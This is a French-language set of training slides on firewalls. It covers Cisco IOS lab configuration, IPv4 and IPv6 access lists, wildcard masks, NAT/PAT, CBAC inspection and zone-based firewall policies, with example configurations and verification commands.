goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Paramtres rseau
Apprenant X
Equipe Y
Lordre de cration des interfaces est
important.
Zone Descr. IOS Intf Adresse
LAN DHCP Server dbut .100/24 f0/0 192.168.1XY.1/24
WAN Bridged, NAT Sortant f0/1 10.0.0.2/24
DMZ DHCP Server dbut .160/24 f1/0 192.168.XY.1/24
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Accs la console
Les routeurs/pare-feu Cisco sont fournis
avec une configuration vierge.
Veuillez vous connecter la console des
machines de la topologie
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Configuration de dpart
service password-encryption
enable secret motdepasse
!
hostname R1
ip domain name entreprise.lan
ip name-server 8.8.8.8
ip domain-lookup
!
ip dns server
!
username root secret mot_de_passe
!
line vty 0 4
login local
!
crypto key generate rsa
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Service DHCP (LAN et DMZ)
ip dhcp excluded-address 192.168.115.1 192.168.115.99
ip dhcp excluded-address 192.168.23.1 192.168.23.159
!
ip dhcp pool DHCP_LAN
network 192.168.115.0 255.255.255.0
default-router 192.168.115.1
dns-server 192.168.115.1
!
ip dhcp pool DHCP_DMZ
network 192.168.23.0 255.255.255.0
default-router 192.168.23.1
dns-server 192.168.23.1
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Interfaces et routage IPv4
interface FastEthernet0/0
description interface zone LAN
ip address 192.168.115.1 255.255.255.0
no shutdown
!
interface FastEthernet0/1
description interface zone WAN
ip address 10.0.0.2 255.255.255.0
ip nat outside
no shutdown
!
interface FastEthernet1/0
description interface zone DMZ
ip address 192.168.23.1 255.255.255.0
ip nat inside
no shutdown
!
ip route 0.0.0.0 0.0.0.0 10.0.0.1
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
NAT Overload
ip nat inside source list NAT_source interface FastEthernet0/1 overload
!
ip access-list standard NAT_source
permit 192.168.115.0 0.0.0.255
permit 192.168.23.0 0.0.0.255
!
interface FastEthernet0/0
description interface zone LAN
ip nat inside
!
interface FastEthernet0/1
description interface zone WAN
ip nat outside
!
interface FastEthernet1/0
description interface zone DMZ
ip nat inside
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Diagnostic
show ip interface brief
show ip route
ping cisco.goffinet.org
ping 8.8.8.8
show ip route
ping (tendu sur linterface f0/0 LAN)
traceroute (tendu sur linterface f0/0 LAN)
show ip nat translations
show ip dhcp binding
debug ip nat ...
debug ip dhcp ...
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
16. ACLs Cisco IOS
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
ACL dfinition et utilit
ACL = ensemble de rgles de filtrage du trafic
Utiles pour :
les fonctions de pare-feu
marquage du trafic
NAT
Contrler les logs, les accs consoles
virtuelles (VTY), ...
Vision Cisco IOS mais bon point de dpart en
scurit.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Deux types dACLs IPv4
Les deux types dACLs se distinguent en fonction des
critres utiliss. Une liste simple (standard) et lautre plus
complexe (tendue).
Standard : uniquement adresse IPv4 source
Etendue :
protocole IPv4, ICMPv4, TCP, UDP, ESP, AH, ...
origine et destination
port et types de messages
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
ACLs numrotes
Les ACLs numrotes sont constitues dun
ensemble de rgles :
ordonnes selon la frappe
ayant un mme numro
Pratique obsolte (en IPv6) dont le numro
indique la nature :
IP standard : 1 - 99 et 1300 - 1999
IP tendue : 100 - 199 et 2000 - 2699
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Exemple dACLs numrotes
En configuration globale :(config)#
access-list 1 deny host 192.168.10.1
access-list 1 permit any
ou
access-list 102 deny tcp any any eq 23
access-list 102 permit ip any any
LACL standard 1 empche seulement le trafic venant de lhte 192.168.10.1
LACL extended 102 empche tout trafic vers le service Telnet et autorise tout autre trafic
IPv4.
Faut-il encore placer ces ACLs dans une fonction (filtrage, marquage, rgles NAT)
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
ACL nommes
Les ACLs nommes prennent un nom.
Il faut spcifier le type standard ou extended en IPv4.
Les ACLs IPv6 sont doffice extended.
les rgles sincrmentent dun numro dordre (tous les
10). Cet ID permet dinsrer des rgles dans une liste.
(config)#ip access-list standard ACL_IPv4_STD
(config-std-nacl)#permit | deny ?
(config)#exit
(config)#ip access-list extended ACL_IPv4_EXT
(config-ext-nacl)#permit | deny ?
(config)#exit
(config)#ipv6 access-list ACL_IPv6
(config-ipv6-acl)#permit | deny ?
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Exemple ACLs nommes
(config)#ip access-list extended IPv4_LAN
(config-ext-nacl)#
permit tcp 192.168.0.0 0.0.255.255 any eq 80
#show access-lists
Extended IP access list IPv4_LAN
10 permit tcp 192.168.0.0 0.0.255.255 any eq www
20 permit tcp 192.168.0.0 0.0.255.255 any eq 443
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Logique
Le routeur parcourt la liste daccs et valide chaque rgle jusqu trouver une
correspondance.
Si une correspondance est trouve, le routeur prend la dcision permit ou
deny correspondante.
Une ACL se termine toujours par un deny any implicite.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Masque gnrique
Il ne faut pas confondre un masque gnrique (wilcard
mask) avec un masque de sous-rseau (subnet mask).
Un masque gnrique est un masque de filtrage.
Quand un bit aura une valeur de 0 dans le masque, il y
aura vrification de ce bit sur l'adresse IP de rfrence.
Lorsque le bit aura une valeur de 1, il n'en y aura pas.
Cette notion est utilise dans les configurations
OSPFv2 sous Cisco IOS.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Masque de rseau
Un masque de rseau est un masque de division ou de
regroupement. Une addition boolenne d'une adresse
IP et d'un masque de rseau est utilise pour distinguer
la partie rseau de la partie hte.
En binaire, alors qu'un masque de rseau est
ncessairement une suite homogne de 1 et puis de 0,
un masque gnrique peut tre une suite
quelconque de 1 et de 0 en fonction du filtrage que l'on
veut oprer sur des adresses IP.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Exemples de masque gnrique (1/3)
Soit un masque gnrique 0.0.0.0 demande une
correspondance exacte de ladresse IP de rfrence :
permit 192.168.1.1 0.0.0.0
Le mot-cl host remplace 0.0.0.0
permit host 192.168.1.1
255.255.255.255 filtre toutes les adresses IPv4.
permit 0.0.0.0 255.255.255.255
Le mot-cl any remplace 0.0.0.0 255.255.255.255
permit any
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Exemples de masque gnrique (2/3)
Filtrer 192.168.1.0/24
192.168.1.0 255.255.255.0
ACL : 192.168.1.0 0.0.0.255
Filtrer 192.168.1.40/30
192.168.1.40 255.255.255.252
ACL : 192.168.1.40 0.0.0.3
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Exemples de masque gnrique (3/3)
Masque de sumarization :
Filtrer tous les rseaux qui commencent en
192.168 :
ACL : 192.168.0.0 0.0.255.255
Numros pairs sur le dernier octet du /24 :
ACL : 192.168.1.0 0.0.0.254
Numros impairs sur le troisime octet :
ACL : 0.0.1.0 255.255.254.255
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Applications
En soi, une ACL na pas de porte si elle nest pas
applique.
Filtrage sans tat de trafic de donnes sur des interfaces.
Firewall (filtrage tat) sur des interfaces : ACL bloquante
Filtrage de trafic de trafic de gestion (sur une ligne VTY).
Trafic source dans une rgle NAT (inside source list) pour
dsigner de nombreuse adresses IP prives traduire.
Transfert de port
Dboggage pour filtrer les sorties.
et bien dautres en ingnrie du trafic (VPN, QoS,
filtrage du routage, routage la demande, ).
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Direction des ACLs
Les liste daccs sappliquent sur les interfaces :
pour le trafic entrant sur linterface, in
pour le trafic sortant de linterface, out
#show access-lists
Extended IP access list IPv4_LAN
10 permit tcp 192.168.0.0 0.0.255.255 any eq www (5 match(es))
20 permit tcp 192.168.0.0 0.0.255.255 any eq 443
(config)#int f0/0
(config-subif)#ip access-group IPv4_LAN in
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Autres types dACLs
Ce document ne couvre pas dautres types d
ACLs Cisco :
ACLs established
Reflexive ACLs
Dynamic ACLs (sorte de Port Knocking)
Time-based ACLs that use time ranges
Authentication proxy
Turbo ACLs
Distributed time-based ACLs
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Exemples de mise en oeuvre
Refuser laccs dun hte un rseau
Autoriser une plage contigus dadresses IP
Autoriser laccs dun hte une interface
Refuser/autoriser du trafic SSH
Autoriser du trafic TCP 80
Pare-simple CBAC
Autoriser des Pings (ICMP)
Autoriser le Web, le mail, FTP et SSH
Autoriser le trafic DNS
Autoriser le trafic de routage
Dboggage du trafic
Filtrage VTY
Rgles implicites en IPv6
Filtrage IPv6
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Refuser laccs dun hte un
rseau
Refuser PC1 daccder Server :
R1#sh ip dhcp binding
Bindings from all pools not associated with VRF:
IP address Client-ID/ Lease expiration Type
Hardware address/
User name
192.168.23.160 0800.2790.cf87 Mar 02 2002 12:00 AM Automatic
192.168.115.160 0800.2742.56ff Mar 02 2002 12:00 AM Automatic
192.168.115.161 0800.27bf.000a Mar 02 2002 12:00 AM Automatic
R1#conf t
R1(config)#ip access-list standard DENY_PC1_SERVER
R1(config-std-nacl)#deny host 192.168.23.160
R1(config-std-nacl)#exit
R1(config)#int f1/0
R1(config-if)#ip access-group DENY_PC1_SERVER out
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Autoriser une plage contigus d
adresses IP
Imaginons que lon ait toute une srie de LANs
adresss en 192.168.X.X/24 derrire le pare-
feu :
R1(config)#ip access-list standard DENY_LANS
R1(config-std-nacl)#deny 192.168.0.0 0.0.255.255
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Autoriser laccs dun hte une
interface
R1#sh ip dhcp binding
Bindings from all pools not associated with VRF:
IP address Client-ID/ Lease expiration Type
Hardware address/
User name
192.168.23.160 0800.2790.cf87 Mar 02 2002 12:00 AM Automatic
192.168.115.160 0800.2742.56ff Mar 02 2002 12:00 AM Automatic
192.168.115.161 0800.27bf.000a Mar 02 2002 12:00 AM Automatic
R1#conf t
R1(config)#ip access-list standard PERMIT_PC1
R1(config-std-nacl)#permit host 192.168.115.160
R1(config-std-nacl)#exit
R1(config)#int f0/0
R1(config-if)#ip access-group PERMIT_PC1 in
Test partir de PC1 et de PC2 avant et aprs lapplication de lACL
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Refuser/autoriser du trafic SSH
Sur une interface : ?
Sur le service : ?
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Autoriser du trafic TCP 80
R1(config)#ip access-list extended PERMIT_TCP
R1(config-ext-nacl)#10 permit udp any eq domain any
R1(config-ext-nacl)#20 permit tcp any eq www 192.168.115.0
0.0.0.255 established
R1(config-ext-nacl)#exit
R1(config)#int f0/1
R1(config-if)#ip access-group PERMIT_TCP in
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Pare-feu simple CBAC
(config)#ip access-list extended IP_BLOCK
(config-ext-nacl)#permit udp any eq 53 any
(config-ext-nacl)#exit
(config)#exit
(config)#int f0/1
(config-if)#ip access-group IP_BLOCK in
#show access-list IP_BLOCK
Extended IP access list IP_BLOCK
deny ip any any (39 match(es))
(config)#ip inspect name FW udp
(config)#ip inspect name FW tcp
(config)#int f0/0
(config-subif)#ip inspect FW in
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Autoriser des Pings (ICMP)
Le plus simplement du monde avec CBAC :
R1(config)#ip inspect name FW icmp
Autrement par ACL :
R1(config)#ip access-list extended PERMIT_ICMP
R1(config-ext-nacl)#permit icmp any any echo
R1(config-ext-nacl)#permit icmp any any echo-reply
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Autoriser le Web, le Mail, FTP et SSH
Vers le serveur en DMZ 192.168.23.160 venant
de toutes les autres zones :
R1(config)#ip access-list extended DMZ_SERVICES
R1(config-ext-nacl)#permit tcp any any eq www
R1(config-ext-nacl)#permit tcp any any eq 22
R1(config-ext-nacl)#permit tcp any any eq smtp
R1(config-ext-nacl)#permit tcp any any eq pop3
R1(config-ext-nacl)#permit tcp any any eq 21
R1(config-ext-nacl)#permit tcp any any eq 20
R1(config-ext-nacl)#
R1(config-ext-nacl)#exit
R1(config)#int f1/0
R1(config-if)#ip access-group DMZ_SERVICES out
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Autoriser le trafic DNS
Dur dur lInternet sans DNS
permit udp any any eq domain
permit udp any eq domain any
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Autoriser des mises--jour de
routage
permit udp any any eq rip
permit eigrp any any
permit ospf any any
permit tcp any any eq 179
permit tcp any eq 179 any
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Dboggage du trafic
Par exemple :
R1(config)#access-list 199 permit tcp host 192.168.115.160
host 192.168.23.60
R1(config)#access-list 199 permit tcp host 192.168.23.60
host 192.168.115.160
R1(config)#end
R1#debug ip packet 199 detail
IP packet debugging is on (detailed) for access list 199
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Filtrage VTY
(config)#ip access-list extended VTY
(config-ext-nacl)#permit ip host 172.16.0.1 any
(config-ext-nacl)#permit ip 192.168.0.0 0.0.255.255 any
(config-ext-nacl)#exit
(config)#line vty 0 4
(config-line)#ip access-class VTY in
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
NAT
Permet de traduire :
les adresses internes (inside)
prive (local) en
publique (global)
les adresses externes (outside)
Le routeur NAT tient une table de traduction
Il transforme le trafic : il remplace les en-ttes
IP et de couche transport (UDP/TCP).
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
PAT
Un routeur peut prendre en compte le port TCP
ou UDP utilis.
Permet de transfrer un service TCP ou UDP
sur une adresse prive vers une adresse
publique.
Permet de multiplexer la connectivit globale d
un LAN avec une seule adresse IP publique.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Transfert de port
(config)#
ip nat inside source static tcp 192.168.10.1
3389 interface f0/1 3389
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Mise en oeuvre du PAT
access-list 1 permit 192.168.0.0 0.0.255.255
ip nat inside source list 1 interface f0/1
overload
interface f0/0.1
ip nat inside
interface f0/0.2
ip nat inside
interface f0/1
ip nat outside
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Vrification du NAT/PAT
Gateway#show ip nat translations
Pro Inside global Inside local Outside local Outside
global
icmp 195.238.2.21:11 192.168.1.254:11 195.238.2.22:11 195.238.2.22:
11
icmp 195.238.2.21:12 192.168.1.254:12 195.238.2.22:12 195.238.2.22:
12
icmp 195.238.2.21:13 192.168.1.254:13 195.238.2.22:13 195.238.2.22:
13
icmp 195.238.2.21:14 192.168.1.254:14 195.238.2.22:14 195.238.2.22:
14
icmp 195.238.2.21:15 192.168.1.254:15 195.238.2.22:15 195.238.2.22:
15
Gateway#
Inside Local = adressage priv
Inside Global = adressage public
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Rfrences
http://www.cisco.com/c/en/us/support/docs/ip/access-
lists/26448-ACLsamples.html
http://www.cisco.com/c/en/us/td/docs/ios-
xml/ios/ipv6/configuration/15-2s/ipv6-15-2s-book/ip6-
sec-trfltr-fw.html#GUID-F9C70A05-6CC1-48F8-8DCA-
A40291E343ED
http://www.bortzmeyer.org/ipv6-securite.html
http://www.cisco.
com/en/US/prod/collateral/iosswrel/ps6537/ps6553/whit
e_paper_c11-678658.html
RFC 6092 et RFC 6204 : recommandations de ltrage
sur les CPE end-user.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
17. Cisco ZBF
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Zone-based policy firewall
Le modle de configuration Zone-based policy firewall
(ZPF or ZBF or ZFW) a t introduit en 2006 avec lIOS
12.4(6)T.
Avec ZPF, les interfaces sont assignes des zones
sur lesquelles une rgle dinspection du trafic
(inspection policy) est applique. Elle vrifie le trafic qui
transite entre les zones.
Une rgle par dfaut bloque tout trafic tant quune rgle
explicite ne contredit pas ce comportement.
ZPF supporte toutes fonctionnalits SPI, filtrage des
URLs et contre-mesure des DoS.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Rgles ZPF
Une zone doit tre configure (cre) avant quune interface puisse en
faire partie.
Une interface ne peut tre assigne qu une seule zone.
Tout le trafic vers ou venant dune interface donne est bloqu quand elle
est assigne une zone sauf pour le trafic entre interfaces dune mme
zone et pour le trafic du routeur lui-mme.
Une policy (policy-map), politique de scurit autorise ou inspecte
(class-maps) le trafic doit tre configure entre deux zones.
La self zone est une exception ce refus implicite de tout. Tout le trafic
vers nimporte quelle interface du routeur est autoris jusquau moment o
il est implicitement refus.
Les actions Pass, Inspect et Drop ne peuvent tre applique quentre des
interfaces appartenant des zones distinctes.
Les interfaces qui ne participent pas ZPF fonctionnent comme des ports
classiques et peuvent utiliser une configuration SPI/CBAC.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Inspect
Configures Cisco IOS SPI (equivalent to ip inspect command).
It automatically allows for return traffic and potential ICMP messages.
For protocols requiring multiple parallel signaling and data sessions (for example,
FTP or H.323), the inspect action also handles the proper establishment of data
sessions.
Pass
Analogous to a permit statement in an ACL.
It does not track the state of connections or sessions within the traffic.
Pass allows the traffic only in one direction.
A corresponding policy must be applied to allow return traffic to pass in the opposite
direction.
Drop
Analogous to a deny statement in an ACL.
A log option is available to log the rejected packets.
3 Actions de ZPF
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Cisco Policy Language (CPL)
Configuration
1. Dfinir des class-maps (rgles) qui dcrivent le trafic que
la politique de scurit va vrifier (action) travers un
zone-pair.
2. Dfinir les policy-maps qui dfinissent les politiques de
scurits (comprenant des class-maps)
3. Definir les zones.
4. Assigner les interfaces aux zones.
5. Definir les zone-pairs.
6. Appliquer les policy-maps aux zone-pairs.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Pare-feu 1 : LAN - Internet
Cette configuration en quatre tapes met en place le par-
feu SPI qui vrifie le trafic HTTP, HTTPS, DNS et ICMP
destination de lInternet.
1. Class-maps
2. Policy-map
3. Zones et interfaces
4. Zone-pair
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Class-maps
Les Class-maps dcrivent le trafic qui est
permis entre les zones (selon la politique de
scurit) :
conf t
class-map type inspect match-any internet-traffic-class
match protocol http
match protocol https
match protocol dns
match protocol icmp
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Policy-map
Un Policy-map, politique de scurit, reprend l
ensemble de vos critres de filtrage (Class-
maps) :
conf t
policy-map type inspect lan-internet-policy
class type inspect internet-traffic-class
inspect
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Zones et interfaces
Configuration des zones et assignation des
interfaces :
conf t
zone security lan
zone security internet
interface f0/0
zone-member security lan
interface f0/1
zone-member security internet
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Zone-pair
Configuration du lien zone-pair et application
de la policy-map approprie :
conf t
zone-pair security lan-internet source lan destination
internet
service-policy type inspect lan-internet-policy
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Vrification
show policy-map type insp zone-pair
show zone security lan
show zone-pair security
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Exercice
Mise en place dune politique de filtrage du
LAN la DMZ.
Mise en place dune politique de filtrage de l
Internet la DMZ.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Rfrences
http://www.cisco.
com/c/en/us/support/docs/security/ios-
firewall/98628-zone-design-guide.html
http://www.cisco.
com/c/en/us/support/docs/security/ios-
firewall/109479-zbf-vpn-traffic.html
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
18. Pare-feu Cisco IPv6
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Objectifs
Sinformer sur le march et les gnralits
Configurer, diagnostiquer et prouver :
ACL : filtrage sans tat
IPv6 IOS Firewall : SPI + ACL
IPv6 Zone-Based Firewall (ZBF)
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Filtrages IPv6
Prfixes bogon
En-ttes et extension den-tte
Filtrage des tunnels (6in4, GRE, IPSEC, )
Firewall L2
Logs et performances
Dans les diapositives suivantes :
1. ACL : filtrage sans tat
2. IPv6 IOS Firewall : SPI + ACL
3. IPv6 Zone-Based Firewall (ZBF)
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Cisco IPv6 ACLs
Les ACLs IPv6 sont trs similaires aux ACLs IPv4. Il ny a plus que des ACLs
nommes tendues.
(config)#ipv6 access-list name
permit/deny protocol {source-ipv6-prefix/prefix-length |
any | host source-ipv6-address | auth} [operator [port-
number]] {destination-ipv6-prefix/prefix-length | any |
host destination-ipv6-address | auth} [operator [port-
number]] [dest-option-type[doh-number | doh-type]] [dscp
value] [flow-label value] [fragments] [log] [log-input]
[mobility] [mobility-type [mh-number | mh-type]] [reflect
name [timeout value]] [routing] [routing-type routing-
number] [sequence value] [time-range name]
Les ACLs IPv6 sont appliques sur les interfaces en utilisant la commande
ipv6 traffic-filter access-list-name {in | out}.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Entres implicites ACLs
All IPv6 ACLs contain 2 implicit permit statements to allow IPv6
neighbor discovery packets to be sent and received.
permit icmp any any nd-na
permit icmp any any nd-ns
Like IPv4 ACLs, all IPv6 ACLs include an implicit deny as the
last statement.
deny ipv6 any any
These statements will not display in the configuration output. A
best practice is to manually enter all 3 implicit commands.
Manually entering the implicit deny statement will also allow you to log
denied packets without affecting neighbor discovery.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Exemple ACL
Exemple refuser tout trafic TCP80 pour une
adresse en dehors du LAN :
interface f0/0
description interface LAN
ipv6 traffic-filter BLOCK_HOST_01 in
!
ipv6 access-list BLOCK_HOST_01
sequence 20 deny tcp host 2001:DB8:1ab::1 any eq www
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Trafic bloquer
unspecified address::
loopback address ::1
IPv4-compatible addresses ::/96
IPv4-mapped addresses (obsolete) ::ffff:0.0.0.0/96, ::/8
automatically tunneled packets using compatible addresses (deprecated RFC 4291)
::0.0.0.0/96
other compatible addresses ::224.0.0.0/100, ::127.0.0.0/104, ::0.0.0.0/104, ::
255.0.0.0/104
false 6to4 packets 2002:e000::/20, 2002:7f00::/24, 2002:0000::/24, 2002:ff00::
/24, 2002:0a00::/24, 2002:ac10::/28, 2002:c0a8::/32
link-local addresses (see specific section about ICMP) fe80::/10
site-local addresses (deprecated) fec0::/10
unique-local packets fc00::/7
multicast packets (only as a source address) ff00::/8
documentation address 2001:db8::/32
6Bone addresses (deprecated) 3ffe::/16
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Messages ND autoriser
Messages ND autoriser :
IPv6 multicast packets (MAC addresses 3333.0000.0000 to 3333.FFFF.FFFF) and
have a solid multicast state table
Permit Neighbor Advertisement (NA), Neighbor Solicitation (NS) messages, and
Duplicate Address Detection (DAD) packets
Permit Router Advertisement (RA) messages and Router Solicitation (RS)
messages for SLAAC
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Exemple dACL bloquante
ipv6 access-list Internet-Inbound
remark Deny loopback address
deny ipv6 ::1/128 any
remark Deny IPv4-compatible addresses
deny ipv6 0::/96 any
remark Deny IPv4-mapped addresses (obsolete)
deny ipv6 ::ffff:0.0.0.0/96 any
remark Deny auto tunneled packets w/compatible addresses (RFC 4291)
deny ipv6 ::0.0.0.0/96 any
remark Deny other compatible addresses
deny ipv6 ::224.0.0.0/100 any log
deny ipv6 ::127.0.0.0/104 any log
deny ipv6 ::0.0.0.0/104 any log
deny ipv6 ::255.0.0.0/104 any log
remark Deny false 6to4 packets
deny ipv6 2002:e000::/20 any log
deny ipv6 2002:7f00::/24 any log
deny ipv6 2002:0000::/24 any log
deny ipv6 2002:ff00::/24 any log

goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Exemple dACL bloquante (c.)
deny ipv6 2002:0a00::/24 any log
deny ipv6 2002:ac10::/28 any log
deny ipv6 2002:c0a8::/32 any log
remark Permit good NDP messages since we deny and log at the end
permit icmp fe80::/10 any nd-na
permit icmp fe80::/10 any nd-ns
remark Deny Link-Local communications
deny ipv6 fe80::/10 any
remark Deny Site-Local (deprecated)
deny ipv6 fec0::/10 any
remark Deny Unique-Local packets
deny ipv6 fc00::/7 any
remark Deny multicast packets
deny ipv6 ff00::/8 any
remark Deny Documentation Address
deny ipv6 2001:db8::/32 any
remark Deny 6Bone addresses (deprecated)
deny ipv6 3ffe::/16 any
remark Deny RH0 packets
deny ipv6 any any routing-type 0 log

goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Exemple dACL bloquante (c.)
remark Deny our own addresses coming inbound
deny ipv6 2001:db8:11::/48 any log
remark permit BGP to and from our EBGP neighbor
permit tcp host 2001:db8:4::1 host 2001:db8:4::2 eq bgp
permit tcp host 2001:db8:4::1 eq bgp host 2001:db8:4::2
remark Permit traffic to our web server
permit tcp any host 2001:db8:11::100 eq www
remark Permit our returned traffic from internal clients
permit tcp any 2001:db8:11::/48 range 1024 65535
permit udp any 2001:db8:11::/48 range 1024 65535
remark Permit inbound DNS responses to our internal caching DNS server
permit udp any eq domain host 2001:db8:11:30:20c:29ff:fe5d:982a
remark Permit good ICMPv6 message types
permit icmp any 2001:db8:11::/48 destination-unreachable
permit icmp any 2001:db8:11::/48 packet-too-big
permit icmp any 2001:db8:11::/48 parameter-problem
permit icmp any 2001:db8:11::/48 echo-reply
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Exemple dACL bloquante (c.)
remark Permit our ISP to ping our external interface
permit icmp host 2001:db8:4::1 host 2001:db8:4::2 echo-request
remark Deny everything else and log it
deny ipv6 any any log
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Firewall CBAC standard
Firewall Cisco IOS SPI et ACL. En 6 tapes :
1. Vrifier la connectivit et le routage
2. Configuration globale
3. Configuration des interfaces
4. Configuration des ACLs
5. Tester de lextrieur et de lintrieur
6. Ouvrez du trafic
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Paramtres globaux
! paramtres globaux
enable
configure terminal
ipv6 unicast-routing
ipv6 inspect name ipv6_test icmp timeout 60
ipv6 inspect name ipv6_test tcp timeout 60
ipv6 inspect name ipv6_test udp timeout 60
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Configuration des interfaces
interface FastEthernet0/0
description LAN (TRUST)
ipv6 enable
ipv6 traffic-filter INBOUND out
ipv6 inspect ipv6_test in
!
interface FastEthernet0/1
description WAN (UNTRUST)
ipv6 enable
ipv6 traffic-filter OUTBOUND in
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
ACLs bloquantes
ipv6 access-list INBOUND
permit icmp any any nd-na
permit icmp any any nd-ns
deny ipv6 any any log
!
ipv6 access-list OUTBOUND
permit icmp any any nd-na
permit icmp any any nd-ns
deny ipv6 any any log
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
1. Create the Zones for the firewall.
zone security
2. Define Traffic Classes.
- class-map type inspect
3. Specify Firewall Policies.
- policy-map type inspect
4. Apply Firewall Policies to pairs of source and destination
zones.
- zone-pair
5. Assign Router Interfaces to zones.
- zone-member security
Configuring ZPF
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Exemple de configuration ZBF
https://supportforums.cisco.com/docs/DOC-28403
The below topology brings a simple network containing two security zones. Host H1 (Client) and H2
(Admin) are connected to inside interface Gigabit Ethernet 0/1 accessing web server connected to
outside interface Gigabit Ethernet 0/0.
We will have the goal of allowing
1. Only HTTP and HTTPS traffic for H1 (Client) from the inside to the outside
2. HTTP, HTTPS and ICMP for H2 (Admin) from the inside to the outside
All other traffic should drop from inside to outside.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Cration du firewall
parameter-map type inspect v6-param-map
sessions maximum 10000
ipv6 routing-header-enforcement loose
!
class-map type inspect match-any v6-class
match protocol tcp
match protocol udp
match protocol icmp
match protocol ftp
!
policy-map type inspect v6-policy
class type inspect v6-class
inspect
!
zone security z1
zone security z2
!
zone-pair security zp source z1 destination z2
service-policy type inspect v6-policy
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Configuration des interfaces
interface FastEthernet0/0
description LAN (TRUST)
ipv6 enable
zone-member z1
!
interface FastEthernet0/1
description WAN (UNTRUST)
ipv6 enable
zone-member z2
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Diagnostic fondamental
Sous Cisco IOS :
show ipv6 access-list [access-list-name]
show ipv6 inspect {name inspection-name | config |
interfaces | session [detail] | all}
show logging [slot slot-number | summary]
Pour les preuves :
nmap -6
ping
thc-ipv6 : http://www.si6networks.com/presentations/ipv6kongress/mhfg-
ipv6-kongress-ipv6-security-assessment.pdf
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
goffinet@goffinet.eu, Introduction aux pare-feu, BY-CC